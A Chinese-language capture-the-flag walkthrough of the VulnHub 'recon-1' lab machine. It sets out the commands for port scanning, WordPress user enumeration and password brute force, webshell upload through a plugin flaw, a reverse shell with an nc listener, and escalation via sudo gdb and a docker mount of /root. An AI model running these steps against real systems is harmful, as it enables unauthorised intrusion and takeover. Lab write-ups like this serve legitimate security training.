靶机下载:https://www.vulnhub.com/entry/recon-1,438/
测试工具:靶机、kali、Windows(可选)
测试过程:
1、下载好靶机后,先导入虚拟机中,网卡模式使用NAT模式
2、打开虚拟机(我这里使用的是VMware),首先要修改root密码登录(为了配置网络),破解密码教程
3、进入系统后查看IP,发现不能获取IP,经查资料以后发现配置文件/etc/network/interfaces中的网卡不对,将图中该位置修改为ens33
4、重新启动网卡(以下任意一条命令即可)
# service network restart
# /etc/init.d/networking restart
查看靶机ip:ifconfig
5、使用nmap对靶机进行端口扫描
nmap -sT 192.168.26.130
6、发现了22和80端口是开放的,22应该是用于远程连接的,先访问一下80端口
浏览发现有登录的入口,尝试登陆
7、试了几个简单的用户名和密码后发现不行,使用wpscan枚举用户名试试
wpscan --url 192.168.26.130 -e u
在结果中发现了这样两条结果
8、尝试进行密码爆破(-U 指定用户名、-P 指定密码字典)
wpscan --url 192.168.26.130 -U reconauthor -P /usr/share/wordlists/rockyou.txt
8、爆出了密码,尝试登录
9、发现这里可以上传文件,先下载下来hack文件查看一下
hack.zip应该是一个php反弹木马,意味着这个目录下可以执行zip压缩文件下的php文件,尝试上传一句话木马,并用蚁剑连接
连接失败,再看看别的绕过办法
10、经过百度,发现在在这里可以上传且执行(看漏洞详细介绍链接)
11、上传一句话木马,用蚁剑连接
连接成功(http://website/wp-content/uploads/articulate_uploads/poc/index.php
),在Wordpress目录下上传php大马
12、访问大马,拿到Webshell,提权
查看可利用的用户:cat /etc/passwd |grep /bin/bash
查看系统信息:uname -a
查看版本信息:lsb_release -a
到/home目录下看看有没有可用的信息,看来接下来要找root的一个叫flag.txt的文件,接着淦
13、继续提权,查看有没有可以利用的命令find / -user root -perm -4000 -print 2>/dev/null
不过好像没什么可用的,但是mount、umount好像用得到,
14、在/tmp目录下上传一个反弹shell,并在kali上开启监听nc -lvvp 6666
6666为监听端口号
在大马页面运行反弹shell,kali监听到了
将简单的Shell转换成为完全交互式shellpython3 -c 'import pty;pty.spawn("/bin/bash")'
15、切换到/home目录下,查看所有文件ls -al
找可获取权限的用户的密码:find / -user hacker
find / -user offensivehack
找到文件但是没有权限
看看自己能执行哪些权限sudo -l
,有惊喜
尝试执行试试:sudo -u offensivehack /usr/bin/gdb
接着获取offensivehack用户的权限:!bash
查看可执行哪些权限:suod -l
,看来需要密码,行不通
再看看别的信息:groups
,发现了有docker
查看docker镜像:docker images
尝试将root目录挂载到Ubuntu的/mnnt目录下docker run -it -v /root:/mnnt/ ubuntu /bin/bash
,成功
16、进入/muut目录,查看flag.txt文件,‘Good Job’,终于完成了。